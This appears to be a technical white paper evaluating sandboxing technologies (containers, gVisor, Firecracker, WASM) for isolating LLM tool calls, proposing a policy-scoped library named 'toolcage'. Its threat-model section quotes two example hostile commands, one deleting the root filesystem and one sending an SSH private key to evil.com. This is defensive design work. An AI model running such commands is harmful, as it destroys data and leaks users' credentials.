# Sandboxed Tool Execution for Open Models

**Author:** Roman "Romanov" Research-Rachmaninov, #B4mad Industries
**Date:** 2026-02-19
**Bead:** beads-hub-42d

## Abstract

Tool use is emerging as the critical capability gap between proprietary and open-source language models. Sebastian Raschka (Lex Fridman #490) identifies it as "the huge unlock" but flags trust as the barrier: unconstrained tool execution on a user's machine risks data destruction, exfiltration, and privilege escalation. This paper evaluates four sandboxing technologies — OCI containers, gVisor, Firecracker microVMs, and WebAssembly (WASM) — for isolating LLM-initiated tool calls. We propose a **security-scoped tool execution layer** that #B4mad can extract from OpenClaw as a standalone library, enabling any local open model to safely invoke tools.

## Context: Why This Matters for #B4mad

OpenClaw already implements sandboxed execution: sub-agents run shell commands, edit files, and control browsers within a managed environment with policy-based access control. This capability is baked into the platform but not extractable. Meanwhile, the open-model ecosystem (Qwen, Llama, Mistral) is rapidly gaining function-calling abilities but lacks a standardized, secure execution runtime. There is a clear product opportunity: a lightweight, embeddable sandbox library that any inference framework (llama.cpp, vLLM, Ollama) can use to safely execute tool calls.

## The Trust Problem

When an LLM generates a tool call like `exec("rm -rf /")` or `curl https://evil.com/exfil --data @~/.ssh/id_rsa`, the runtime must enforce:

1. **Filesystem isolation** — restrict reads/writes to a scoped directory
2. **Network policy** — block or allowlist outbound connections
3. **Syscall filtering** — prevent privilege escalation, raw device access
4. **Resource limits** — CPU, memory, time caps to prevent DoS
5. **Capability scoping** — per-tool permission grants (this tool may read files but not write; that tool may make HTTP requests but only to api.example.com)
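The capability-scoping requirement in particular amounts to a deny-by-default lookup before every tool action. A minimal sketch in Python (all names here are illustrative, not an API from any existing library):

```python
from dataclasses import dataclass

# Hypothetical sketch of a deny-by-default capability check for one tool.
@dataclass
class Capabilities:
    readable_paths: tuple = ()   # path prefixes the tool may read
    writable_paths: tuple = ()   # path prefixes the tool may write
    network_hosts: tuple = ()    # host:port pairs; empty means no network

def is_allowed(caps: Capabilities, action: str, target: str) -> bool:
    """Allow only what the tool explicitly declared; deny everything else."""
    if action == "read":
        return any(target.startswith(p) for p in caps.readable_paths)
    if action == "write":
        return any(target.startswith(p) for p in caps.writable_paths)
    if action == "connect":
        return target in caps.network_hosts
    return False  # unknown action kinds are denied by default

# A web-fetch tool may reach exactly one endpoint and touch no files.
web_fetch = Capabilities(network_hosts=("api.example.com:443",))
```

With this grant, `is_allowed(web_fetch, "connect", "evil.com:443")` and `is_allowed(web_fetch, "write", "/etc/passwd")` both fail, while the declared endpoint succeeds.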

## Technology Evaluation

### 1. OCI Containers (Docker, Podman)

**How it works:** Tool calls execute inside a container with a minimal filesystem, dropped capabilities, seccomp profiles, and network namespaces.

| Aspect | Assessment |
|--------|------------|
| Startup latency | 200–500ms (cold), <100ms (warm with pool) |
| Isolation strength | Good — namespace + cgroup + seccomp. Not a security boundary by default, but hardened configs (rootless, no-new-privileges, read-only rootfs) are strong |
| Ecosystem maturity | Excellent — universal tooling, broad adoption |
| Filesystem scoping | Bind-mount specific directories read-only or read-write |
| Network control | `--network=none` or custom network policies |
| Overhead | Low — shared kernel, minimal memory overhead |

**Verdict:** Best default choice. Lowest friction, most mature, sufficient isolation for the threat model (untrusted LLM output, not adversarial kernel exploits).
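The hardened configuration the table mentions can be assembled from standard `podman run` (or `docker run`) flags. A sketch that builds such an invocation for one tool call; the image name, mount path, and resource caps are placeholder choices, not recommendations:

```python
import shlex

def hardened_run_argv(image: str, workdir: str, command: list) -> list:
    """Build a locked-down `podman run` argv for a single tool call."""
    return [
        "podman", "run", "--rm",
        "--network=none",                       # no outbound connections
        "--read-only",                          # immutable root filesystem
        "--cap-drop=ALL",                       # drop all Linux capabilities
        "--security-opt", "no-new-privileges",  # block setuid escalation
        "--memory=256m",                        # memory cap
        "--pids-limit=64",                      # fork-bomb protection
        "-v", f"{workdir}:/workspace:rw",       # the only writable path
        image,
    ] + command

argv = hardened_run_argv(
    "docker.io/library/python:3.12-slim",
    "/tmp/job",
    ["python", "-c", "print('ok')"],
)
print(shlex.join(argv))
```

Warm-pool startup (the <100ms row) would keep such containers pre-created and pass commands in via `podman exec` instead, at the cost of pool management.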

### 2. gVisor (runsc)

**How it works:** A user-space kernel that intercepts syscalls, providing an additional isolation layer on top of OCI containers. Used by Google Cloud Run.

| Aspect | Assessment |
|--------|------------|
| Startup latency | 300–800ms |
| Isolation strength | Excellent — syscall interception means container escapes require defeating both gVisor and the host kernel |
| Ecosystem maturity | Good — drop-in OCI runtime replacement |
| Compatibility | ~90% of Linux syscalls; some edge cases (io_uring, certain ioctls) fail |
| Performance | 5–30% overhead on I/O-heavy workloads due to syscall interposition |

**Verdict:** Strong choice when higher isolation is needed (e.g., executing code generated by untrusted models). The OCI compatibility means it's a runtime swap, not an architecture change.
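Because runsc is an OCI runtime, the swap is mostly configuration. With Docker, for example, gVisor's documented setup registers the runtime in `/etc/docker/daemon.json` (the binary path below assumes a typical install location):

```json
{
  "runtimes": {
    "runsc": {
      "path": "/usr/local/bin/runsc"
    }
  }
}
```

After a daemon restart, `docker run --runtime=runsc …` runs the same image under gVisor, with no changes to images or orchestration.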

### 3. Firecracker microVMs

**How it works:** Lightweight VMs with a minimal VMM (Virtual Machine Monitor), booting a stripped Linux kernel in ~125ms. Used by AWS Lambda and Fly.io.

| Aspect | Assessment |
|--------|------------|
| Startup latency | 125–200ms (impressive for a full VM) |
| Isolation strength | Maximum — hardware virtualization boundary (KVM). Separate kernel instance |
| Resource overhead | ~5MB memory for the VMM; guest kernel adds ~20–40MB |
| Ecosystem maturity | Moderate — requires KVM, custom rootfs images, API-driven lifecycle |
| Complexity | High — snapshot/restore helps latency but adds operational complexity |

**Verdict:** Overkill for most tool calls but appropriate for high-risk operations (arbitrary code execution, untrusted plugins). The snapshot/restore pattern could pre-warm VMs for sub-100ms cold starts.
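The "API-driven lifecycle" in the table refers to Firecracker's REST API served over a Unix-domain socket: a client configures the VM with PUT requests to resources such as `/machine-config` and `/boot-source`, then triggers an `InstanceStart` action. As a sketch, a minimal `/machine-config` payload (the sizes are illustrative, not recommendations):

```json
{
  "vcpu_count": 1,
  "mem_size_mib": 128
}
```

Companion PUTs supply the kernel image and root drive before boot; this configuration sequence is part of why operating Firecracker is more involved than launching a container.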

### 4. WebAssembly (WASM) Sandboxes

**How it works:** Tool implementations compiled to WASM run in a sandboxed runtime (Wasmtime, WasmEdge) with capability-based security (WASI).

| Aspect | Assessment |
|--------|------------|
| Startup latency | <1ms (near-instant) |
| Isolation strength | Very good — linear memory model, no raw syscalls, capability-based I/O |
| Ecosystem maturity | Growing but incomplete — WASI preview 2 still stabilizing; not all tools can be compiled to WASM |
| Language support | Rust, C/C++, Go (via TinyGo), Python (via componentize-py, limited) |
| Limitation | Cannot run arbitrary shell commands; tools must be purpose-built as WASM components |

**Verdict:** Ideal for a curated tool catalog (file operations, HTTP clients, parsers) but cannot sandbox arbitrary shell execution. Complementary to container-based approaches.

## Proposed Architecture: `toolcage`

We propose a library called **`toolcage`** (working name) with the following design:

```
┌─────────────────────────────────────┐
│         Inference Runtime           │
│  (Ollama / vLLM / llama.cpp)        │
│                                     │
│  Model generates: tool_call(...)    │
│         │                           │
│         ▼                           │
│  ┌─────────────┐                    │
│  │  toolcage   │  ← policy engine   │
│  │  library    │  ← sandbox manager │
│  └──────┬──────┘                    │
│         │                           │
└─────────┼───────────────────────────┘
          │
          ▼
┌─────────────────────┐
│  Sandbox Backend    │
│  ┌───┐ ┌───┐ ┌───┐  │
│  │OCI│ │gVi│ │WAS│  │
│  │   │ │sor│ │M  │  │
│  └───┘ └───┘ └───┘  │
└─────────────────────┘
```

### Core Concepts

1. **Tool Registry** — each tool declares its capabilities: filesystem paths, network endpoints, max execution time, required syscalls
2. **Policy Engine** — a TOML/YAML policy file maps tools to allowed capabilities, similar to OpenClaw's existing tool policies
3. **Sandbox Backend** — pluggable: OCI (default), gVisor (hardened), Firecracker (maximum), WASM (for built-in tools)
4. **Result Extraction** — structured output capture (stdout/stderr/exit code/files) with size limits

### Example Policy

```toml
[tool.web_fetch]
backend = "oci"
network = ["allowlist:api.example.com:443"]
filesystem = "none"
timeout = "30s"
memory = "128MB"

[tool.code_execute]
backend = "gvisor"
network = "none"
filesystem = { writable = ["/workspace"], readable = ["/data"] }
timeout = "60s"
memory = "512MB"

[tool.file_edit]
backend = "wasm"
filesystem = { writable = ["/workspace/project"] }
network = "none"
timeout = "10s"
```

### Integration Points

- **Ollama:** Post-generation hook that intercepts tool calls before execution
- **vLLM:** Custom tool executor callback in the serving layer
- **llama.cpp:** Function call handler in server mode
- **OpenClaw:** Replace the current exec subsystem with toolcage for consistency

## Competitive Landscape

| Project | Approach | Gap |
|---------|----------|-----|
| OpenAI Code Interpreter | Proprietary sandbox | Not available locally |
| E2B.dev | Cloud-hosted sandboxes | Requires network round-trip; not local-first |
| Modal | Serverless containers | Cloud-only; not embeddable |
| Daytona | Dev environment sandboxes | Full workspace, not per-tool-call scoped |
| **toolcage** (proposed) | **Local, per-call, policy-scoped** | **Does not exist yet** |

The key differentiator: **toolcage** would be the first local-first, embeddable, per-tool-call sandbox with declarative security policies.

## Recommendations

1. **Start with OCI + rootless Podman** as the default backend. It's available everywhere, well-understood, and sufficient for the primary threat model.

2. **Implement the policy engine first** — this is the real value. The sandbox backend is pluggable; the security model is the product.

3. **Ship as a Go or Rust library with a CLI wrapper** — embeddable in inference runtimes but also usable standalone (`toolcage exec --policy tools.toml -- python script.py`).

4. **Contribute to the MCP (Model Context Protocol) ecosystem** — Anthropic's MCP is becoming the standard for tool definitions. A toolcage MCP server that wraps any tool in a sandbox would have immediate adoption.

5. **Extract from OpenClaw incrementally** — OpenClaw's exec subsystem already solves this problem. Factor out the sandbox and policy layers as a library, then have OpenClaw depend on it.

6. **Publish as open source** — this positions #B4mad as a thought leader in secure local AI infrastructure, driving adoption toward the broader OpenClaw platform.

## Risk Assessment

| Risk | Likelihood | Mitigation |
|------|-----------|------------|
| Container escape via kernel exploit | Low | gVisor/Firecracker backends for high-risk tools |
| Policy misconfiguration allows exfiltration | Medium | Deny-by-default; require explicit allowlists; lint policies |
| Performance overhead kills UX | Medium | Container pooling; WASM for lightweight tools; warm caches |
| Ecosystem moves to cloud-only sandboxes | Low | Local-first is a strong counter-position for privacy-conscious users |

## References

1. Raschka, S. (2026). Interview on Lex Fridman Podcast #490, "AI State of the Art 2026." ~32:54 timestamp discussing tool use and containerization.
2. Google gVisor Project. https://gvisor.dev/
3. AWS Firecracker. https://firecracker-microvm.github.io/
4. WebAssembly System Interface (WASI). https://wasi.dev/
5. Anthropic Model Context Protocol (MCP). https://modelcontextprotocol.io/
6. E2B.dev — Open-source cloud sandboxes for AI. https://e2b.dev/
7. Open Containers Initiative (OCI) Runtime Specification. https://opencontainers.org/

---

*This paper was produced by Romanov (Research-Rachmaninov) for #B4mad Industries. Filed under bead beads-hub-42d.*